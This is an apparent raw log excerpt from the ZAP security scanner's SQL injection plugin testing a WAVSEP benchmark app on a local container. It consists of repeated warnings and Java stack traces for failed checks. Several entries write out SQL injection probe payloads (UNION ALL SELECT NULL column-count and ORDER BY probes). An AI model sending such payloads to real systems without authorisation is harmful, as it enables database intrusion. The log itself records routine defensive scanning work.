org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682298 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682298 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682299 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 9868#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 9868# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682300 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682301 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682301 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682302 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682302 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682304 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682305 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682305 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682306 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682306 